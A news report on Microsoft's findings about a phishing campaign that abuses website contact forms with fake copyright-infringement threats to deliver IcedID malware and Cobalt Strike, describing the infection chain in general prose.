Microsoft says it has been tracking a new attack method in which malicious actors are using websites’ contact forms to deliver malware to enterprise email addresses under the false pretenses of legal action.
The malware being delivered is IceID, which is used to steal information, according to a Microsoft 365 Defender Threat Intelligence Team blog post. The malicious emails instruct users to click a Google link that requires them to sign in with their Google credentials to review phony evidence that supports phony allegations, but that link instead downloads the malware.
According to Microsoft, the IceID malware was primarily a banking trojan, but it can be used for reconnaissance and data exfiltration and lead to additional malware payloads, including ransomware.
IcedID itself is a banking trojan that has evolved to become an entry point for more sophisticated threats, including human-operated ransomware. It connects to a command-and-control server and downloads additional implants and tools that allow attackers to perform hands-on-keyboard attacks, steal credentials, and move laterally across affected networks to delivering additional payloads.
The attackers may be using an automated process that circumvents CAPTCHA protections. Because the emails come from the websites’ email marketing system, they appear more legitimate than typical phishing emails.
The actual messages include strong language urging recipients to click the link to download alleged evidence. In one example posted in Microsoft’s blog, an attacker purports to be a photographer who is claiming that the company’s website used one of their photographs without permission. The photographer threatens legal action if the alleged photos aren’t removed.
However, clicking the link brings the recipient to a Google page that requires their Google credentials.
After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.
The .dat file loads via the rundll32 executable, which then launches numerous commands to steal information, including machine discovery, anitivurs information, IP and system information, domain information and dropping SQLite for accessing credentials stored in browser databases, according to Microsoft.
Microsoft also noted a secondary attach chain that acts as a backup attack flow for when the sites.google.com page in the primary attack chain has been taken down. In this chain, users are redirected to a .top domain while inadvertently accessing a Google User Content page that downloads the malicious .ZIP file.
When run, IcedID connects to a command-and-control server to download modules that run its primary function of capturing and exfiltrating banking credentials and other information. It achieves persistence via schedule tasks. It also downloads implants like Cobalt Strike and other tools, which allow remote attackers to run malicious activities on the compromised system, including collecting additional credentials, moving laterally, and delivering secondary payloads.
In the examples Microsoft gave, the sender purports to be either a designer or illustrator, claiming a copyright violation. This creates a relatively high rate of success for the attackers and a new form of social engineering.
In the blog, Microsoft also offered queries to find emails and downloads associated with the threat.